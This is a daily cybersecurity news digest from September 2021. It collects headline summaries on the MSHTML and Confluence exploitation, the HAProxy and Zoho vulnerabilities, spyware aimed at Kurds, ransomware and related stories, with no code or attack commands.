Security daily (08-09-2021)

17 additional AWS services authorized for DoD workloads in the AWS GovCloud Regions

I’m pleased to announce that the Defense Information Systems Agency (DISA) has authorized 17 additional Amazon Web Services (AWS) services and features in the AWS GovCloud (US) Regions, bringing the total to 105 services and major features that are authorized for use by the U.S. Department of Defense (DoD). AWS now offers additional services to […] (AWS Security Blog)

IRS used vape store receipts to gather evidence against alleged Ukrainian scammer

U.S. law enforcement officials gathered details about a suspected cybercriminal by collecting intelligence from his apparent messages to vape shops in Ukraine. The accused scammer, Glib Oleksandr Ivanov-Tolpintsev, was arraigned Tuesday during an 11-minute hearing in which he appeared virtually from the Pinellas County Jail near Tampa, Fla. Ivanov-Tolpintsev is accused of accessing victims’ username and password credentials between 2016 and 2020, then acting as a seller on a cybercriminal forum where he sold the sensitive data and leased access to a botnet, an army of hacked computers capable of sending spam or infecting more computers. Using the aliases “sergios” and “mars,” Ivanov-Tolpintsev allegedly claimed that his botnet was capable of accessing 2,000 usernames and passwords a day, enabling other perpetrators to carry out identity theft or other kinds of fraud. U.S. officials accused the defendant of earning more than $80,000 as part of the scheme over four years. The […] The post IRS used vape store receipts to gather evidence against alleged Ukrainian scammer appeared first on CyberScoop. (CyberScoop)

Russian cybercrime continues as government-backed attacks on companies dwindle, CrowdStrike says

The Russian approach to hacking shifted considerably over the past year, with state-sponsored attacks on commercial organizations dropping off even as the local cybercrime scene dominated the field, CrowdStrike said in a report Wednesday. From July 2020 to June of this year, Russian state-backed hacking outfits accounted for only a tiny sliver of nation-sponsored attacks aimed at commercial enterprises detected by the cyber firm’s threat hunting service, at 1% compared to China’s 69%. (The figure represents the findings from only one threat intelligence firm, and does not account for hacking campaigns that CrowdStrike might have missed.) Meanwhile, the suspected Russia-based hacking group that CrowdStrike calls Wizard Spider, and that has used the Ryuk ransomware since 2018, was responsible for double the number of detected attempted intrusions of any other cybercrime gang over the same period. While CrowdStrike didn’t have comparison figures on the percentages of state-sponsored attacks on commercial organizations […] The post Russian cybercrime continues as government-backed attacks on companies dwindle, CrowdStrike says appeared first on CyberScoop. (CyberScoop)

A spyware app designed to monitor Kurdish targets attracted more than 1,400 downloads

More than 1,400 people have downloaded a spyware app that, while appearing to deliver news, enables hackers to collect sensitive data about the Kurds, an ethnic community living throughout Iran, Iraq and northern Syria. The espionage campaign involves duping Android smartphone owners into downloading a program that spies use to record phone calls, extract files, take screenshots and gather other information from unwitting victims, according to details published Tuesday by the security vendor ESET. The endeavor marks the latest attempt to undercut the Kurds, an indigenous people embedded in conflicts of the Middle East over the past generation. Kurdish fighters have been active in the fight against the Islamic State group dating back to 2014, aligning with U.S forces while also struggling against the Turkish government. Suspected Iranian hackers also used mobile spyware to monitor Kurdish targets, the security firm Check Point reported in February. The effort that ESET discovered […] The post A spyware app designed to monitor Kurdish targets attracted more than 1,400 downloads appeared first on CyberScoop. (CyberScoop)

Pro-Beijing operatives used social media to try promoting NYC protest

Pro-China operatives behind an effort to cast a negative light on the United States during the COVID-19 pandemic tried using social media to promote a street demonstration earlier this year, according to findings released Wednesday by the intelligence firm Mandiant. As a part of ongoing research into suspected Chinese influence operations, investigators discovered a network of fake accounts spamming Twitter and other platforms in April with posts calling for Asian Americans to protest racial discrimination in New York City. The effort was an “early warning” that China is getting bolder in how it attempts to influence politics outside of its borders, says John Hultquist, vice president of threat intelligence at Mandiant, a division of FireEye. “The intent is what worries me here because they’re already trying to cross the serious line of getting people on the street,” said Hultquist. Mandiant did not definitively attribute the effort to the Chinese government. […] The post Pro-Beijing operatives used social media to try promoting NYC protest appeared first on CyberScoop. (CyberScoop)

Windows zero-day MSHTML attack – how not to get booby trapped!

Zero-day bug in MSHTML, the "mini-Internet Explorer" component of Windows, triggered by booby trapped Office files. (Naked Security)

TeamTNT Hacking Group Strikes Thousands Of Victims Worldwide

(News ≈ Packet Storm)

Ransomware Attack Hits Howard University

(News ≈ Packet Storm)

ProtonMail Under Fire After Police Data Handover

(News ≈ Packet Storm)

Netgear Smart Switches Open To Complete Takeover

(News ≈ Packet Storm)

Multistage WordPress Redirect Kit

Recently, one of our analysts @kpetku came across a series of semi-randomised malware injections in multiple WordPress environments. Typical of spam redirect infections, the malware redirects visitors by calling malicious files hosted on third party infected websites. Interestingly, the infection stores itself as encoded content in the database and is called through random functions littered throughout plugin files using a very common wordpress function “get_option”. In this post we will review this infection and its characteristics. Continue reading Multistage WordPress Redirect Kit at Sucuri Blog. (Sucuri Blog)

CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild. The flaw, tracked as CVE-2021-40539, concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus (The Hacker News)

3 Ways to Secure SAP SuccessFactors and Stay Compliant

The work-from-anywhere economy has opened up the possibility for your human resources team to source the best talent from anywhere. To scale their operations, organizations are leveraging the cloud to accelerate essential HR functions such as recruiting, onboarding, evaluating, and more. SAP is leading this HR transformation with its human capital management (HCM) solution, SAP SuccessFactors. (The Hacker News)

HAProxy Found Vulnerable to Critical HTTP Request Smuggling Attack

A critical security vulnerability has been disclosed in HAProxy, a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. Tracked as CVE-2021-40346, the Integer Overflow vulnerability (The Hacker News)

Experts Uncover Mobile Spyware Attacks Targeting Kurdish Ethnic Group

Cybersecurity researchers on Tuesday released new findings that reveal a year-long mobile espionage campaign against the Kurdish ethnic group to deploy two Android backdoors that masquerade as legitimate apps. Active since at least March 2020, the attacks leveraged as many as six dedicated Facebook profiles that claimed to offer tech and pro-Kurd content — two aimed at Android users while the (The Hacker News)

[Ebook] The Guide for Speeding Time to Response for Lean IT Security Teams

Most cyber security today involves much more planning, and much less reacting than in the past. Security teams spend most of their time preparing their organizations' defenses and doing operational work. Even so, teams often must quickly spring into action to respond to an attack. Security teams with copious resources can quickly shift between these two modes. They have enough resources to (The Hacker News)

U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw

The U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system. "Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate," the Cyber National (The Hacker News)

What Ragnar Locker Got Wrong About Ransomware Negotiators – Podcast

There are a lot of "tells" that the ransomware group doesn't understand how negotiators work, despite threatening to dox data if victims call for help. (Threatpost)

Tooling Network Detection & Response for Ransomware

Justin Jett, director of audit and compliance at Plixer, discusses how to effectively use network flow data in the fight against ransomware. (Threatpost)

Spoofing Bug Highlights Cybersecurity for Digital Vaccine Passports

Australian immunization app bug lets attackers fake vaccine status. (Threatpost)


/security-daily/ 09-09-2021 23:44:24